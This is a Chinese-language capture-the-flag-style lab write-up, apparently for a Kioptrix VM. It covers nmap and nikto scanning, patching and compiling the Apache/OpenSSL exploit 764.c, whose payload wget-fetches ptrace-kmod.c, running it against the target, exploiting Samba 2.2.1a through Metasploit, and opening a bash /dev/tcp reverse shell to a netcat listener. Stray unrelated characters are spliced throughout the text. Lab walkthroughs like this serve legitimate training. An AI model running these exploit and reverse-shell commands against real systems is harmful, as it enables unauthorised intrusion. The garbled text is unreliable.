一、kali nmap 發(fā)現(xiàn)主機(jī)
1.用namp掃描c段 沒發(fā)現(xiàn)主機(jī)
解決辦法 :
(1):打開靶機(jī)所在文件夾蚓哩,找到vmx后綴的文件并打開
(2):將Bridged全部改成nat(默認(rèn)是橋接模式疮绷,因為kali是nat才能掃描IP)
2.識別到主機(jī)IP為192.168.65.134
3.端口掃描迫横,發(fā)現(xiàn)開放了80酷窥、22继找、111口猜、139负溪、443、1024端口
4.nikto目錄掃描
二济炎、漏洞利用之a(chǎn)pache
1.搜索apache 1.3.20版本漏洞
2.編譯執(zhí)行漏洞
- 發(fā)現(xiàn)編譯764.c失敗川抡,解決辦法如下:
- 安裝libssl,命令
sudo apt-get install libssl1.0-dev
- 在頭文件添加
#include <openssl/rc4.h> #include <openssl/md5.h>
- 將#define COMMAND2,wget后面的URL修改為https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
- 將unsigned char *p, *end前添加const
5.在kali編譯成功
gcc -o okk 764.c -lcrypto
- 執(zhí)行漏洞成功
./okk 0x6b 192.168.65.134 -c 40
三须尚、漏洞利用之Samba
Samba是在Linux和UNIX系統(tǒng)上實現(xiàn)SMB協(xié)議的一個免費軟件崖堤,由服務(wù)器及客戶端程序構(gòu)成
1.信息收集發(fā)現(xiàn)主機(jī)139端口安裝了samba,版本為Samba 2.2.1a
2.直接msf搜索samba
3.漏洞利用提權(quán)
4.nc反彈shell
1.kali nc監(jiān)聽端口
nc -lvvp 1234
2.反彈shell
bash -i >& /dev/tcp/192.168.65.129/1234 0>&1
(192.168.65.129是kali主機(jī)的ip,不是靶機(jī)的ip)
3.反彈成功